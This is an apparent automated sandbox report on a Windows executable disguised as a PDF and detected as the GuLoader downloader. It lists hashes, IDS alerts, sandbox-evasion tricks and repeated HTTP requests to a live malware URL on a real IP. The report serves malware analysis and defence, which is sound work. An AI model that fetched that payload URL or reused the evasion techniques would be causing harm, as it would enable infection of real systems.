Edit tour

Windows Analysis Report
IMAGE000Pdf.exe

Overview

General Information

Sample name:	IMAGE000Pdf.exe
Analysis ID:	1548539
MD5:	53441f2de2d573f3b2e4fb35c248229b
SHA1:	afc840f25adfcb5873f5b69e55b2920c370a2285
SHA256:	5bc4b28288f068f1c11e69b1cc94aacb4b0d2812494c1673471b890f1ce67a9e
Tags:	exeGuLoaderuser-abuse_ch
Infos:

Detection

GuLoader

Score:	88
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Multi AV Scanner detection for submitted file

Yara detected GuLoader

AI detected suspicious sample

Initial sample is a PE file and has a suspicious name

Switches to a custom stack to bypass stack traces

Tries to detect virtualization through RDTSC time measurements

Contains functionality to dynamically determine API calls

Contains functionality to shutdown / reboot the system

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected potential crypto function

Drops PE files

Found dropped PE file which has not been started or loaded

May sleep (evasive loops) to hinder dynamic analysis

PE / OLE file has an invalid certificate

Sample execution stops while process was sleeping (likely an evasion)

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Classification

Process Tree

System is w10x64

IMAGE000Pdf.exe (PID: 7416 cmdline: "C:\Users\user\Desktop\IMAGE000Pdf.exe" MD5: 53441F2DE2D573F3B2E4FB35C248229B)

IMAGE000Pdf.exe (PID: 7752 cmdline: "C:\Users\user\Desktop\IMAGE000Pdf.exe" MD5: 53441F2DE2D573F3B2E4FB35C248229B)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
CloudEyE, GuLoader	CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.	No Attribution	http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943 https://any.run/cybersecurity-blog/deobfuscating-guloader/ https://asec.ahnlab.com/en/55978/ https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.1804567210.00000000050D3000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
00000003.00000002.3192256494.0000000002153000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security

Suricata Signatures

ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-04T16:16:29.112597+0100	2022930	1	A Network Trojan was detected	172.202.163.200	443	192.168.2.9	49795	TCP
2024-11-04T16:17:06.917480+0100	2022930	1	A Network Trojan was detected	172.202.163.200	443	192.168.2.9	49973	TCP

ETPRO MALWARE Common Downloader Header Pattern UHCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-04T16:16:05.830050+0100	2803270	2	Potentially Bad Traffic	192.168.2.9	49980	173.249.193.48	80	TCP
2024-11-04T16:17:14.626933+0100	2803270	2	Potentially Bad Traffic	192.168.2.9	49972	173.249.193.48	80	TCP
2024-11-04T16:17:33.163894+0100	2803270	2	Potentially Bad Traffic	192.168.2.9	49974	173.249.193.48	80	TCP
2024-11-04T16:17:51.674002+0100	2803270	2	Potentially Bad Traffic	192.168.2.9	49975	173.249.193.48	80	TCP
2024-11-04T16:18:10.179042+0100	2803270	2	Potentially Bad Traffic	192.168.2.9	49976	173.249.193.48	80	TCP
2024-11-04T16:18:28.685872+0100	2803270	2	Potentially Bad Traffic	192.168.2.9	49977	173.249.193.48	80	TCP
2024-11-04T16:18:47.170399+0100	2803270	2	Potentially Bad Traffic	192.168.2.9	49978	173.249.193.48	80	TCP
2024-11-04T16:19:05.689254+0100	2803270	2	Potentially Bad Traffic	192.168.2.9	49979	173.249.193.48	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: IMAGE000Pdf.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://173.249.193.48/VdpAwrpsFeHTHv196.bin

Avira URL Cloud: Label: malware

Multi AV Scanner detection for submitted file

Source: IMAGE000Pdf.exe

ReversingLabs: Detection: 13%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Source: IMAGE000Pdf.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: IMAGE000Pdf.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: mshtml.pdb source: IMAGE000Pdf.exe, 00000003.00000001.1803045320.0000000000649000.00000020.00000001.01000000.00000008.sdmp
Source:	Binary string: mshtml.pdbUGP source: IMAGE000Pdf.exe, 00000003.00000001.1803045320.0000000000649000.00000020.00000001.01000000.00000008.sdmp

Source: C:\Users\user\Desktop\IMAGE000Pdf.exe	Code function: 0_2_0040674C FindFirstFileW,FindClose,		0_2_0040674C
Source: C:\Users\user\Desktop\IMAGE000Pdf.exe	Code function: 0_2_00405B00 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,		0_2_00405B00

Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49979 -> 173.249.193.48:80
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49976 -> 173.249.193.48:80
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49978 -> 173.249.193.48:80
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49975 -> 173.249.193.48:80
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49974 -> 173.249.193.48:80
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49972 -> 173.249.193.48:80
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49977 -> 173.249.193.48:80
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49980 -> 173.249.193.48:80
Source: Network traffic	Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 172.202.163.200:443 -> 192.168.2.9:49973
Source: Network traffic	Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 172.202.163.200:443 -> 192.168.2.9:49795

Source: global traffic	HTTP traffic detected: GET /VdpAwrpsFeHTHv196.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: 173.249.193.48Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /VdpAwrpsFeHTHv196.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: 173.249.193.48Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /VdpAwrpsFeHTHv196.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: 173.249.193.48Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /VdpAwrpsFeHTHv196.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: 173.249.193.48Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /VdpAwrpsFeHTHv196.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: 173.249.193.48Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /VdpAwrpsFeHTHv196.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: 173.249.193.48Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /VdpAwrpsFeHTHv196.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: 173.249.193.48Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /VdpAwrpsFeHTHv196.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: 173.249.193.48Cache-Control: no-cache

Source: unknown	TCP traffic detected without corresponding DNS query: 173.249.193.48
Source: unknown	TCP traffic detected without corresponding DNS query: 173.249.193.48
Source: unknown	TCP traffic detected without corresponding DNS query: 173.249.193.48
Source: unknown	TCP traffic detected without corresponding DNS query: 173.249.193.48
Source: unknown	TCP traffic detected without corresponding DNS query: 173.249.193.48
Source: unknown	TCP traffic detected without corresponding DNS query: 173.249.193.48
Source: unknown	TCP traffic detected without corresponding DNS query: 173.249.193.48
Source: unknown	TCP traffic detected without corresponding DNS query: 173.249.193.48
Source: unknown	TCP traffic detected without corresponding DNS query: 173.249.193.48
Source: unknown	TCP traffic detected without corresponding DNS query: 173.249.193.48
Source: unknown	TCP traffic detected without corresponding DNS query: 173.249.193.48
Source: unknown	TCP traffic detected without corresponding DNS query: 173.249.193.48
Source: unknown	TCP traffic detected without corresponding DNS query: 173.249.193.48
Source: unknown	TCP traffic detected without corresponding DNS query: 173.249.193.48
Source: unknown	TCP traffic detected without corresponding DNS query: 173.249.193.48
Source: unknown	TCP traffic detected without corresponding DNS query: 173.249.193.48
Source: unknown	TCP traffic detected without corresponding DNS query: 173.249.193.48
Source: unknown	TCP traffic detected without corresponding DNS query: 173.249.193.48
Source: unknown	TCP traffic detected without corresponding DNS query: 173.249.193.48
Source: unknown	TCP traffic detected without corresponding DNS query: 173.249.193.48
Source: unknown	TCP traffic detected without corresponding DNS query: 173.249.193.48
Source: unknown	TCP traffic detected without corresponding DNS query: 173.249.193.48
Source: unknown	TCP traffic detected without corresponding DNS query: 173.249.193.48
Source: unknown	TCP traffic detected without corresponding DNS query: 173.249.193.48
Source: unknown	TCP traffic detected without corresponding DNS query: 173.249.193.48
Source: unknown	TCP traffic detected without corresponding DNS query: 173.249.193.48
Source: unknown	TCP traffic detected without corresponding DNS query: 173.249.193.48
Source: unknown	TCP traffic detected without corresponding DNS query: 173.249.193.48
Source: unknown	TCP traffic detected without corresponding DNS query: 173.249.193.48
Source: unknown	TCP traffic detected without corresponding DNS query: 173.249.193.48
Source: unknown	TCP traffic detected without corresponding DNS query: 173.249.193.48
Source: unknown	TCP traffic detected without corresponding DNS query: 173.249.193.48
Source: unknown	TCP traffic detected without corresponding DNS query: 173.249.193.48
Source: unknown	TCP traffic detected without corresponding DNS query: 173.249.193.48
Source: unknown	TCP traffic detected without corresponding DNS query: 173.249.193.48
Source: unknown	TCP traffic detected without corresponding DNS query: 173.249.193.48
Source: unknown	TCP traffic detected without corresponding DNS query: 173.249.193.48
Source: unknown	TCP traffic detected without corresponding DNS query: 173.249.193.48
Source: unknown	TCP traffic detected without corresponding DNS query: 173.249.193.48
Source: unknown	TCP traffic detected without corresponding DNS query: 173.249.193.48

Source: global traffic	HTTP traffic detected: GET /VdpAwrpsFeHTHv196.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: 173.249.193.48Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /VdpAwrpsFeHTHv196.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: 173.249.193.48Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /VdpAwrpsFeHTHv196.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: 173.249.193.48Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /VdpAwrpsFeHTHv196.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: 173.249.193.48Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /VdpAwrpsFeHTHv196.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: 173.249.193.48Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /VdpAwrpsFeHTHv196.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: 173.249.193.48Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /VdpAwrpsFeHTHv196.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: 173.249.193.48Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /VdpAwrpsFeHTHv196.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: 173.249.193.48Cache-Control: no-cache

Source: IMAGE000Pdf.exe, 00000003.00000002.3194985540.0000000004A74000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://173.249.193.48/VdpAwrpsFeHTHv196.bin
Source: IMAGE000Pdf.exe, 00000003.00000002.3194985540.0000000004A86000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://173.249.193.48/VdpAwrpsFeHTHv196.bin5
Source: IMAGE000Pdf.exe, 00000003.00000002.3194985540.0000000004A86000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://173.249.193.48/VdpAwrpsFeHTHv196.bin:
Source: IMAGE000Pdf.exe, 00000003.00000002.3194985540.0000000004A86000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://173.249.193.48/VdpAwrpsFeHTHv196.binF
Source: IMAGE000Pdf.exe, 00000003.00000002.3194985540.0000000004A74000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://173.249.193.48/VdpAwrpsFeHTHv196.binH
Source: IMAGE000Pdf.exe, 00000003.00000002.3194985540.0000000004A74000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://173.249.193.48/VdpAwrpsFeHTHv196.bind
Source: IMAGE000Pdf.exe, 00000003.00000002.3194985540.0000000004A86000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://173.249.193.48/VdpAwrpsFeHTHv196.bink
Source: IMAGE000Pdf.exe	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: IMAGE000Pdf.exe, 00000003.00000001.1803045320.0000000000649000.00000020.00000001.01000000.00000008.sdmp	String found in binary or memory: http://www.ftp.ftp://ftp.gopher.
Source: IMAGE000Pdf.exe, 00000003.00000001.1803045320.00000000005F2000.00000020.00000001.01000000.00000008.sdmp	String found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
Source: IMAGE000Pdf.exe, 00000003.00000001.1803045320.00000000005F2000.00000020.00000001.01000000.00000008.sdmp	String found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
Source: IMAGE000Pdf.exe, 00000003.00000001.1803045320.0000000000649000.00000020.00000001.01000000.00000008.sdmp	String found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214

System Summary

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: IMAGE000Pdf.exe

Source: C:\Users\user\Desktop\IMAGE000Pdf.exe

Code function: 0_2_004034A2 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

0_2_004034A2

Source: C:\Users\user\Desktop\IMAGE000Pdf.exe

File created: C:\Windows\resources\0809

Jump to behavior

Source: C:\Users\user\Desktop\IMAGE000Pdf.exe

Code function: 0_2_70021B5F

0_2_70021B5F

Source: IMAGE000Pdf.exe

Static PE information: invalid certificate

Source: IMAGE000Pdf.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: classification engine

Classification label: mal88.troj.evad.winEXE@3/11@0/1

Source: C:\Users\user\Desktop\IMAGE000Pdf.exe

0_2_004034A2

Source: C:\Users\user\Desktop\IMAGE000Pdf.exe

File created: C:\Program Files (x86)\Common Files\kvindagtigt.ini

Jump to behavior

Source: C:\Users\user\Desktop\IMAGE000Pdf.exe

File created: C:\Users\user\kretekniske.ini

Jump to behavior

Source: C:\Users\user\Desktop\IMAGE000Pdf.exe

File created: C:\Users\user\AppData\Local\Temp\nso622A.tmp

Jump to behavior

Source: IMAGE000Pdf.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\IMAGE000Pdf.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\IMAGE000Pdf.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: IMAGE000Pdf.exe

ReversingLabs: Detection: 13%

Source: C:\Users\user\Desktop\IMAGE000Pdf.exe

File read: C:\Users\user\Desktop\IMAGE000Pdf.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\IMAGE000Pdf.exe "C:\Users\user\Desktop\IMAGE000Pdf.exe"
Source: C:\Users\user\Desktop\IMAGE000Pdf.exe	Process created: C:\Users\user\Desktop\IMAGE000Pdf.exe "C:\Users\user\Desktop\IMAGE000Pdf.exe"
Source: C:\Users\user\Desktop\IMAGE000Pdf.exe	Process created: C:\Users\user\Desktop\IMAGE000Pdf.exe "C:\Users\user\Desktop\IMAGE000Pdf.exe"	Jump to behavior

Source: C:\Users\user\Desktop\IMAGE000Pdf.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\IMAGE000Pdf.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\IMAGE000Pdf.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\IMAGE000Pdf.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\IMAGE000Pdf.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\IMAGE000Pdf.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\IMAGE000Pdf.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\IMAGE000Pdf.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\IMAGE000Pdf.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\IMAGE000Pdf.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\IMAGE000Pdf.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\IMAGE000Pdf.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\IMAGE000Pdf.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\IMAGE000Pdf.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\IMAGE000Pdf.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\IMAGE000Pdf.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\IMAGE000Pdf.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\IMAGE000Pdf.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\IMAGE000Pdf.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\IMAGE000Pdf.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\IMAGE000Pdf.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\IMAGE000Pdf.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\IMAGE000Pdf.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\IMAGE000Pdf.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\IMAGE000Pdf.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\IMAGE000Pdf.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\IMAGE000Pdf.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Users\user\Desktop\IMAGE000Pdf.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\IMAGE000Pdf.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Users\user\Desktop\IMAGE000Pdf.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\IMAGE000Pdf.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Users\user\Desktop\IMAGE000Pdf.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\IMAGE000Pdf.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\IMAGE000Pdf.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\IMAGE000Pdf.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\IMAGE000Pdf.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\IMAGE000Pdf.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\IMAGE000Pdf.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\IMAGE000Pdf.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\IMAGE000Pdf.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\IMAGE000Pdf.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\IMAGE000Pdf.exe	Section loaded: srvcli.dll	Jump to behavior

Source: C:\Users\user\Desktop\IMAGE000Pdf.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\IMAGE000Pdf.exe

File written: C:\Program Files (x86)\Common Files\kvindagtigt.ini

Jump to behavior

Source: IMAGE000Pdf.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: mshtml.pdb source: IMAGE000Pdf.exe, 00000003.00000001.1803045320.0000000000649000.00000020.00000001.01000000.00000008.sdmp
Source:	Binary string: mshtml.pdbUGP source: IMAGE000Pdf.exe, 00000003.00000001.1803045320.0000000000649000.00000020.00000001.01000000.00000008.sdmp

Data Obfuscation

Yara detected GuLoader

Source: Yara match	File source: 00000000.00000002.1804567210.00000000050D3000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.3192256494.0000000002153000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\IMAGE000Pdf.exe

Code function: 0_2_70021B5F GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,

0_2_70021B5F

Source: C:\Users\user\Desktop\IMAGE000Pdf.exe

File created: C:\Users\user\AppData\Local\Temp\nsx6BC0.tmp\System.dll

Jump to dropped file

Source: C:\Users\user\Desktop\IMAGE000Pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\IMAGE000Pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\IMAGE000Pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\IMAGE000Pdf.exe	API/Special instruction interceptor: Address: 50E2FD0
Source: C:\Users\user\Desktop\IMAGE000Pdf.exe	API/Special instruction interceptor: Address: 2162FD0

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\IMAGE000Pdf.exe	RDTSC instruction interceptor: First address: 50B96E2 second address: 50B96E2 instructions: 0x00000000 rdtsc 0x00000002 cmp ah, ch 0x00000004 cmp ebx, ecx 0x00000006 jc 00007FA09D482426h 0x00000008 cmp ah, ch 0x0000000a inc ebp 0x0000000b inc ebx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\IMAGE000Pdf.exe	RDTSC instruction interceptor: First address: 21396E2 second address: 21396E2 instructions: 0x00000000 rdtsc 0x00000002 cmp ah, ch 0x00000004 cmp ebx, ecx 0x00000006 jc 00007FA09C4F4896h 0x00000008 cmp ah, ch 0x0000000a inc ebp 0x0000000b inc ebx 0x0000000c rdtsc

Source: C:\Users\user\Desktop\IMAGE000Pdf.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsx6BC0.tmp\System.dll

Jump to dropped file

Source: C:\Users\user\Desktop\IMAGE000Pdf.exe TID: 7756

Thread sleep time: -50000s >= -30000s

Jump to behavior

Source: C:\Users\user\Desktop\IMAGE000Pdf.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\IMAGE000Pdf.exe	Code function: 0_2_0040674C FindFirstFileW,FindClose,		0_2_0040674C
Source: C:\Users\user\Desktop\IMAGE000Pdf.exe	Code function: 0_2_00405B00 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,		0_2_00405B00

Source: IMAGE000Pdf.exe, 00000003.00000002.3194985540.0000000004A86000.00000004.00000020.00020000.00000000.sdmp, IMAGE000Pdf.exe, 00000003.00000002.3194985540.0000000004A94000.00000004.00000020.00020000.00000000.sdmp, IMAGE000Pdf.exe, 00000003.00000002.3194985540.0000000004A38000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW

Source: C:\Users\user\Desktop\IMAGE000Pdf.exe	API call chain: ExitProcess graph end node			graph_0-2498
Source: C:\Users\user\Desktop\IMAGE000Pdf.exe	API call chain: ExitProcess graph end node			graph_0-2284

Source: C:\Users\user\Desktop\IMAGE000Pdf.exe

Code function: 0_2_70021B5F GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,

0_2_70021B5F

Source: C:\Users\user\Desktop\IMAGE000Pdf.exe

Process created: C:\Users\user\Desktop\IMAGE000Pdf.exe "C:\Users\user\Desktop\IMAGE000Pdf.exe"

Jump to behavior

Source: C:\Users\user\Desktop\IMAGE000Pdf.exe

0_2_004034A2

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Native API	1 DLL Side-Loading	1 Access Token Manipulation	12 Masquerading	OS Credential Dumping	21 Security Software Discovery	Remote Services	1 Archive Collected Data	1 Encrypted Channel	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	11 Process Injection	1 Virtualization/Sandbox Evasion	LSASS Memory	1 Virtualization/Sandbox Evasion	Remote Desktop Protocol	Data from Removable Media	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	1 Access Token Manipulation	Security Account Manager	3 File and Directory Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
